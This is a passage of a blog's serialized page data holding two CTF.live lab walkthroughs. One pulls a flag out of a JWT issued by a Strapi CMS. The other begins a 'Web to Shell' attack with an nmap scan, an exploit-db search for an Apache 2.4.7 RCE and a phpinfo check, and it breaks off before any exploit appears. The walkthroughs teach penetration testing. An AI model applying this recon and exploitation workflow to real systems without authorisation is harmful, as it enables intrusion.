25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/50e4e/anudeep-reddy.jpg 150w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/471e9/anudeep-reddy.jpg 200w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/74aad/anudeep-reddy.webp 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/d9b14/anudeep-reddy.webp 150w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/6b183/anudeep-reddy.webp 200w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 100px) 100vw, 100px"},"large":{"base64":"data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGQAAAgMBAAAAAAAAAAAAAAAAAAQCAwUB/8QAFwEAAwEAAAAAAAAAAAAAAAAAAQIDAP/aAAwDAQACEAMQAAABmjpopTVOGVBGVV5NlAR//8QAHBAAAgMBAAMAAAAAAAAAAAAAAAECAxEhBDFB/9oACAEBAAEFAvInKKTurOMsWrFpbYb1TkT9/Uf/xAAWEQEBAQAAAAAAAAAAAAAAAAABEBL/2gAIAQMBAT8BCaZ//8QAFxEBAAMAAAAAAAAAAAAAAAAAEAEREv/aAAgBAgEBPwGzMH//xAAdEAABBAIDAAAAAAAAAAAAAAABABARIQISIDFR/9oACAEBAAY/AgMeytppp8QsloDUeH//xAAcEAEBAAICAwAAAAAAAAAAAAABABExQVEQIWH/2gAIAQEAAT8hzj/GcM2GxdlyRglOxZh9rt8LjJDgzglDS0v/2gAMAwEAAgADAAAAEGPvwv/EABcRAQEBAQAAAAAAAAAAAAAAAAEAETH/2gAIAQMBAT8Q1NtgBN7C3//EABkRAAIDAQAAAAAAAAAAAAAAAAABESExUf/aAAgBAgEBPxBwogwrBpcP/8QAGxABAAMBAQEBAAAAAAAAAAAAAQARITFRYUH/2gAIAQEAAT8QHa673kWnQdfSWBXpehNHh9Aey2dwrDeSgAOV+QVICVSaxelz7KW54WI7+zEHcf/Z","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/4b6ce/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/db25d/anudeep-reddy.jpg 82w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/ffb8a/anudeep-reddy.jpg 164w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4b6ce/anudeep-reddy.jpg 328w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/5a48e/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/2d087/anudeep-reddy.webp 82w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/29d87/anudeep-reddy.webp 164w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/5a48e/anudeep-reddy.webp 328w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 328px) 100vw, 328px"}}}],"basePath":"/","slug":"/build-a-webhook-for-google-assistant-action","id":"7e2c739d-9166-5f41-be73-e40d74678404","title":"Build a Webhook for Google Assistant Action","mailchimp":true,"next":[{"id":"1c9b7ba4-600d-5e04-b757-367134cc1da8","slug":"/ctf-live-secret-in-claim","secret":false,"title":"CTF.live - Secret in Claim","author":"Anudeep Reddy","date":"August 3rd, 2020","dateForSEO":"2020-08-03T00:00:00.000Z","timeToRead":3,"excerpt":"This post is a walkthrough of a lab from ctflive.","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n \"title\": \"CTF.live - Secret in Claim\",\n \"author\": \"Anudeep Reddy\",\n \"date\": \"2020-08-03T00:00:00.000Z\",\n \"hero\": \"./images/hero.png\",\n \"excerpt\": \"This post is a walkthrough of a lab from ctflive.\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n return function MDXDefaultShortcode(props) {\n console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n return mdx(\"div\", props);\n };\n};\n\nvar layoutProps = {\n _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n var components = _ref.components,\n props = _objectWithoutProperties(_ref, [\"components\"]);\n\n return mdx(MDXLayout, _extends({}, layoutProps, props, {\n components: components,\n mdxType: \"MDXLayout\"\n }), mdx(\"p\", null, \"This post is a walkthrough of a lab from \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://ctf.live\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"ctflive\"), \". You can find this lab \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.ctf.live/challengedetails?cid=47\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"here\"), \", First give it a try yourself before going through this post. It\\u2019s a JWT based challenge. For those of you who don\\u2019t know what a JWT is. don\\u2019t worry there will be a short introduction about that in this post.\"), mdx(\"h1\", {\n \"id\": \"what-is-jwt\"\n }, \"What is JWT\\uD83E\\uDD14?\"), mdx(\"p\", null, \"JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties. (source: \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://jwt.io\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"https://jwt.io\"), \"). What does this even mean\\uD83E\\uDD37\\u200D\\u2640\\uFE0F?. \"), mdx(\"p\", null, \"Let us have a look at one of the best explanations i read so far and it\\u2019s by Kasey Speakman. I am dropping his dev profile here, do drop a heart on his actual comment that is linked below.\"), mdx(\"p\", null, mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://dev.to/kspeakman\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"kspeakman on Dev\")), mdx(\"p\", null, mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://dev.to/kspeakman/comment/om9\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"kspeakman\\u2019s take on JWT\")), mdx(\"h2\", {\n \"id\": \"lets-get-into-the-actual-working-now\"\n }, \"Let\\u2019s get into the actual working now\"), mdx(\"p\", null, \"A JWT is of the format \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"xxxxxxxxx.yyyyyyyyyyy.zzzzzzzzzzzz\"), \".\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"x\\u2019s specify the algorithm used to sign the JWT in base64.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"y\\u2019s contain the claims in base64.\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"z\\u2019s are the signature that is generated with \", mdx(\"inlineCode\", {\n parentName: \"li\"\n }, \"xxxxxxxxx.yyyyyyyyyyy\"), \" as the data.\")), mdx(\"p\", null, \"The Algorithms that are generally used to sign JWT includes:\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, \"HS256 (Symmetric)\"), mdx(\"li\", {\n parentName: \"ul\"\n }, \"RS256 (Asymmetric)\")), mdx(\"h2\", {\n \"id\": \"where-are-these-used\"\n }, \"Where are these used?\"), mdx(\"p\", null, \"As far as our lab is concerned, we use it to authenticate users to a website. So when a user logins to a website the website will issue a JWT with the claims of who the user is and any additional information. This JWT is sent back to the website in the subsequent requests made by the user. The JWT is first verified to check if the signature is legit, it\\u2019s basically done by again signing the \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"xxxxxxxxx.yyyyyyyyyyy\"), \" of the token and checking if it matches with the signature that is sent as a part of the JWT. If they are equal then the server can trust the claims that come with the JWT. If any user tries to tamper with the claims in the JWT(the data in yyyyyyyyyyyy part) then the signature won\\u2019t match and in an ideal condition the website should through an unauthorized message.\"), mdx(\"h1\", {\n \"id\": \"now-the-lab\"\n }, \"Now the Lab\"), mdx(\"h3\", {\n \"id\": \"mission-\"\n }, \"Mission \\uD83D\\uDCBB\"), mdx(\"p\", null, \"Retrieve the secret information present in the token payload!\"), mdx(\"p\", null, \"We are given with a CMS to interact with. The Lab also gives you with the username and password to login to the user account.\"), mdx(\"h3\", {\n \"id\": \"lets-start\"\n }, \"Let\\u2019s start\"), mdx(\"p\", null, \"Starting the lab you will be given a virtual environment where the CMS is hosted in your local network and you have a machine with all the tools you will need preinstalled.\"), mdx(\"p\", null, \"The challenge page also gives you few instruction on how to access the CMS that is hosted in your local environment.\"), mdx(\"p\", null, \" \", mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/cw5ajh16skmk25mfcrrj.png\",\n \"alt\": \"Lab instructions\"\n }))), mdx(\"p\", null, \"It says the CMS runs on port 1337 and since I have already worked with a CMS that works on that port, I knew it was \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://strapi.io\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"strapi\"), \" already.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/ymodt7ntztsr4n1gmbmo.png\",\n \"alt\": \"Strapi page\"\n }))), mdx(\"p\", null, \"Now let us try to login with the credentials given. Strapi currently manages admin and end users separately. I assume that the credentials given to us are of the end user. So we can\\u2019t access the strapi admin page with these credentials. All we need is the JWT because out flag is hidden these as the name of the challege suggests.\"), mdx(\"p\", null, \"First we need to find the IP address on which the CMS is hosted. For that run \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"ifconfig\"), \" in your console to find your IP and then follow the instructions of the challenge to find the IP of the CMS.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/55zcxc4e198lzkx38jd2.png\",\n \"alt\": \"ifconfig\"\n }))), mdx(\"p\", null, \"In my case my IP was 192.142.236.2 and that of the CMS was 192.142.236.3. It is given in the challenge on what is the auth endpoint and the parameters that it accepts.\"), mdx(\"p\", null, \" \", mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/yvsdjai6skiwa2y2orey.png\",\n \"alt\": \"Api Endpoints\"\n }))), mdx(\"p\", null, \"Let us use curl to send the request. I ran the following command to send a post request to the CMS and retrieve the JWT from the response.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/xprsxz9y4jfpi9ac1pkn.png\",\n \"alt\": \"Alt Text\"\n }))), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/1oou9fr14ikphwjxokd8.png\",\n \"alt\": \"post request curl\"\n }))), mdx(\"p\", null, \"Now copy that JWT from the console and head over to \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://jwt.io\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"jwt.io\"), \" which will decode the JWT for us. \"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/482chkws77fkqb5kh1ei.png\",\n \"alt\": \"jwt.io\"\n }))), mdx(\"h2\", {\n \"id\": \"voila-theres-our-flag\"\n }, \"Voila, there\\u2019s our flag\\uD83C\\uDF89.\"), mdx(\"h1\", {\n \"id\": \"learning\"\n }, \"Learning\"), mdx(\"p\", null, \"Sometimes developers might end up sending critical information in the JWT. Make sure you check for such information during bug bounty or when you are building your own application.\"));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwElEQVQoz12SWUhUURzGL731GNSDRNpGEBREYVQPtrinpu1lg+1RQWSLc0dHqyktLTI0bRHLyaWSxqlMixp1rLFs1Bm3NIugTaPNF4Noc379722Revj4zrn3nO985zufwoElcHg1vrQYOLpWsA7fEQO+1Gh8aig+U7ggTMegjDEG884ST9u5DPouHOZDcSbvS7J4W5TBp+RoFFRZbAwBbVNSMNocUwSkLARztCBqiFPlUFMonqN7yK15SEV9I9c13GvCXuOi17REBJMjGEyO1Bf2mZdReKuKCmctznt11Nyt07n2L8v3Bie2G5UUX7ZTcuUal65WU2KrpKisnD7TYhSfuPmuC4bRkrKcEa5m/D3dTPB0MU4wqqmD0c2PGKlxUydj23oIuFlHedVtXcycnskp60VKbdfpVeM0h5KLKldOmofbGIdfQzOzOp8ws/URU1va8Wv0MN3TQYDbS2BrF0FdTwmoclB24w65BUWUnsnBXmHjvDh+ozn8IQ77JWQyDHgObWFYTQOKZKLUCyQnpdY9xM5GlAYvw2/e5eDxHAwbNuOtq8blcnH6wiW5sjgcMEWReNtBekc3lvtuJturCah0sOpsLnnHdnMsWyX7hInMrN2Yzp5CzcvCkpfJojXrmDZjBvEGAwXnreQXWnltjEX5qEYx7Y6TiZLXpKZ2Zns78W9/xomcVNgZKDVZIJHMh+2BvHxQz5cqK8/3r2fFtkTmBM0lPCYWNW0/1ssVvzLsF4dTHPWM8T7G393OeIHS3IP5pAX2zuOzVOabVOiHdPJDegKfLCvxHtpK1hkrsXFxhISFcjy/gNJyuwiKw6+S4bV9CZRbNmKzbBCs56JlE90pS/WXH5RaoZVbY62vajADxoV6RV7siuTZjlBe7Y2mNymGr2rEn1cO/g8L9F7+I/ab9bG2R/6TImzW5mG/Ec5P+KVbR/RgvXUAAAAASUVORK5CYII=","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/f4f8c/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/206f6/hero.png 236w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/84032/hero.png 472w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/f4f8c/hero.png 944w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/513fc/hero.png 1416w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/6eada/hero.png 1888w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/99fbb/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/77392/hero.webp 236w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/1f177/hero.webp 472w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/99fbb/hero.webp 944w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/4a492/hero.webp 1416w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/b0b8f/hero.webp 1888w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwElEQVQoz12SWUhUURzGL731GNSDRNpGEBREYVQPtrinpu1lg+1RQWSLc0dHqyktLTI0bRHLyaWSxqlMixp1rLFs1Bm3NIugTaPNF4Noc379722Revj4zrn3nO985zufwoElcHg1vrQYOLpWsA7fEQO+1Gh8aig+U7ggTMegjDEG884ST9u5DPouHOZDcSbvS7J4W5TBp+RoFFRZbAwBbVNSMNocUwSkLARztCBqiFPlUFMonqN7yK15SEV9I9c13GvCXuOi17REBJMjGEyO1Bf2mZdReKuKCmctznt11Nyt07n2L8v3Bie2G5UUX7ZTcuUal65WU2KrpKisnD7TYhSfuPmuC4bRkrKcEa5m/D3dTPB0MU4wqqmD0c2PGKlxUydj23oIuFlHedVtXcycnskp60VKbdfpVeM0h5KLKldOmofbGIdfQzOzOp8ws/URU1va8Wv0MN3TQYDbS2BrF0FdTwmoclB24w65BUWUnsnBXmHjvDh+ozn8IQ77JWQyDHgObWFYTQOKZKLUCyQnpdY9xM5GlAYvw2/e5eDxHAwbNuOtq8blcnH6wiW5sjgcMEWReNtBekc3lvtuJturCah0sOpsLnnHdnMsWyX7hInMrN2Yzp5CzcvCkpfJojXrmDZjBvEGAwXnreQXWnltjEX5qEYx7Y6TiZLXpKZ2Zns78W9/xomcVNgZKDVZIJHMh+2BvHxQz5cqK8/3r2fFtkTmBM0lPCYWNW0/1ssVvzLsF4dTHPWM8T7G393OeIHS3IP5pAX2zuOzVOabVOiHdPJDegKfLCvxHtpK1hkrsXFxhISFcjy/gNJyuwiKw6+S4bV9CZRbNmKzbBCs56JlE90pS/WXH5RaoZVbY62vajADxoV6RV7siuTZjlBe7Y2mNymGr2rEn1cO/g8L9F7+I/ab9bG2R/6TImzW5mG/Ec5P+KVbR/RgvXUAAAAASUVORK5CYII=","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/3e3e7/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/a123b/hero.png 163w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/b6f5d/hero.png 327w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/3e3e7/hero.png 653w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/de899/hero.png 980w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/00f25/hero.png 1306w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/0acdf/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/ac59e/hero.webp 163w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/7660b/hero.webp 327w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/0acdf/hero.webp 653w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/75470/hero.webp 980w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/68d47/hero.webp 1306w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACwElEQVQoz12SWUhUURzGL731GNSDRNpGEBREYVQPtrinpu1lg+1RQWSLc0dHqyktLTI0bRHLyaWSxqlMixp1rLFs1Bm3NIugTaPNF4Noc379722Revj4zrn3nO985zufwoElcHg1vrQYOLpWsA7fEQO+1Gh8aig+U7ggTMegjDEG884ST9u5DPouHOZDcSbvS7J4W5TBp+RoFFRZbAwBbVNSMNocUwSkLARztCBqiFPlUFMonqN7yK15SEV9I9c13GvCXuOi17REBJMjGEyO1Bf2mZdReKuKCmctznt11Nyt07n2L8v3Bie2G5UUX7ZTcuUal65WU2KrpKisnD7TYhSfuPmuC4bRkrKcEa5m/D3dTPB0MU4wqqmD0c2PGKlxUydj23oIuFlHedVtXcycnskp60VKbdfpVeM0h5KLKldOmofbGIdfQzOzOp8ws/URU1va8Wv0MN3TQYDbS2BrF0FdTwmoclB24w65BUWUnsnBXmHjvDh+ozn8IQ77JWQyDHgObWFYTQOKZKLUCyQnpdY9xM5GlAYvw2/e5eDxHAwbNuOtq8blcnH6wiW5sjgcMEWReNtBekc3lvtuJturCah0sOpsLnnHdnMsWyX7hInMrN2Yzp5CzcvCkpfJojXrmDZjBvEGAwXnreQXWnltjEX5qEYx7Y6TiZLXpKZ2Zns78W9/xomcVNgZKDVZIJHMh+2BvHxQz5cqK8/3r2fFtkTmBM0lPCYWNW0/1ssVvzLsF4dTHPWM8T7G393OeIHS3IP5pAX2zuOzVOabVOiHdPJDegKfLCvxHtpK1hkrsXFxhISFcjy/gNJyuwiKw6+S4bV9CZRbNmKzbBCs56JlE90pS/WXH5RaoZVbY62vajADxoV6RV7siuTZjlBe7Y2mNymGr2rEn1cO/g8L9F7+I/ab9bG2R/6TImzW5mG/Ec5P+KVbR/RgvXUAAAAASUVORK5CYII=","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/f156e/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/f2848/hero.png 114w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/42f31/hero.png 229w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/f156e/hero.png 457w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/cf471/hero.png 686w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/3bc69/hero.png 914w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/15384/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/31fce/hero.webp 114w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/e3e25/hero.webp 229w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/15384/hero.webp 457w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/0258d/hero.webp 686w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/64ea2/hero.webp 914w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/7ef28/hero.png"}}},{"id":"34ceee51-9606-5899-ab9d-2740dcccd2f9","slug":"/ctf-live-ecommerce-web-to-shell-walkthrough","secret":false,"title":"CTF.live - Ecommerce - Web to Shell Walkthrough","author":"Anudeep Reddy","date":"July 27th, 2020","dateForSEO":"2020-07-27T00:00:00.000Z","timeToRead":3,"excerpt":"This post is a walkthrough of a lab from ctflive.","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n \"title\": \"CTF.live - Ecommerce - Web to Shell Walkthrough\",\n \"author\": \"Anudeep Reddy\",\n \"date\": \"2020-07-27T00:00:00.000Z\",\n \"hero\": \"./images/hero.png\",\n \"excerpt\": \"This post is a walkthrough of a lab from ctflive.\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n return function MDXDefaultShortcode(props) {\n console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n return mdx(\"div\", props);\n };\n};\n\nvar layoutProps = {\n _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n var components = _ref.components,\n props = _objectWithoutProperties(_ref, [\"components\"]);\n\n return mdx(MDXLayout, _extends({}, layoutProps, props, {\n components: components,\n mdxType: \"MDXLayout\"\n }), mdx(\"p\", null, \"This post is a walkthrough of a lab from \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://ctflive.com\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"ctflive\"), \". As the name suggests it\\u2019s a Web Application Lab. I have been in search of beginner level labs to get started and found ctf lab which has labs that are beginner friendly. So without wasting much of your time let\\u2019s get started. \"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"Please go through the entire post as i am going to breakdown the exploit that was used \\uD83D\\uDC68\\u200D\\uD83D\\uDCBB.\")), mdx(\"p\", null, \"Before reading this I would like you to give it a try yourself. Here is the link to the lab. \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.ctf.live/challengedetails?cid=42\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"Ecommerce: Web to Shell\")), mdx(\"h2\", {\n \"id\": \"walkthrough\"\n }, \"Walkthrough\"), mdx(\"p\", null, \"Once you start your lab and open it you should see a e-commerce site. Looking around you can observe that it\\u2019s a php based website. First of all let us try to understand what we need to achieve. \"), mdx(\"h3\", {\n \"id\": \"mission\"\n }, \"Mission\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"The attacker might not have any user-level access to the web application. However, this does not mean that the application cannot be attacked remotely. Vulnerabilities could be triggered even by unauthenticated users.\\n\\nIn this challenge, the attacker is unauthenticated to the web application and needs to find and exploit the vulnerability.\\n\\nObjective: Exploit the vulnerability and retrieve the flag.\\n\")), mdx(\"p\", null, \"This is the mission provided in the lab description. Let\\u2019s try to understand what it means. \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"The attacker might not have any user-level access to the web application\"), \", this statement clearly gives you a hint that you need not create a user account to exploit this lab. And if we look closely at the name of the lab Ecommerce: \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"Web to Shell\"), \", does it ring any bells??.\"), mdx(\"p\", null, \"If you guessed that you need to get a shell access then you are right\\uD83E\\uDD73.\"), mdx(\"p\", null, \"Let\\u2019s start with some recon. I ran a \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"nmap\"), \" scan on the host to grab some info.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {}), \"$> nmap -A \\n\")), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/2jzgoz3bagogh4pm62ns.png\",\n \"alt\": \"Nmap scan results\"\n }))), mdx(\"p\", null, \"From the nmap results now we know that there are two open ports:\\n1. Port 22 running \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\"), \"\\n2. Port 80 running \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"Apache/2.4.7\")), mdx(\"p\", null, \"Let us try to find if there are any vulnerabilities which might lead to RCE(Remote Code Execution) on Apache/2.4.7 as our ultimate goal is to get a shell access. For the vulnerability search let\\u2019s dive into \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://www.exploit-db.com\",\n \"target\": \"_blank\",\n \"rel\": \"noreferrer\"\n }), \"exploit-db\"), \" and search for Apache/2.4.7. I found the following vulnerabilities.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/p33w8z2m9q01f4e0tvq1.png\",\n \"alt\": \"Exploit-db results\"\n }))), mdx(\"p\", null, \"The first one should be our point of interest as it\\u2019s of type Remote Code Execution. But that exploit only works with Apache/2.4.7 in combination with php/7.0.2. Even our current application works on PHP but lets try to find out the version of PHP that our application is using, for that head over to \", mdx(\"inlineCode\", {\n parentName: \"p\"\n }, \"/phpinfo.php\"), \" which should give you a page similar to this.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n parentName: \"p\"\n }, {\n \"src\": 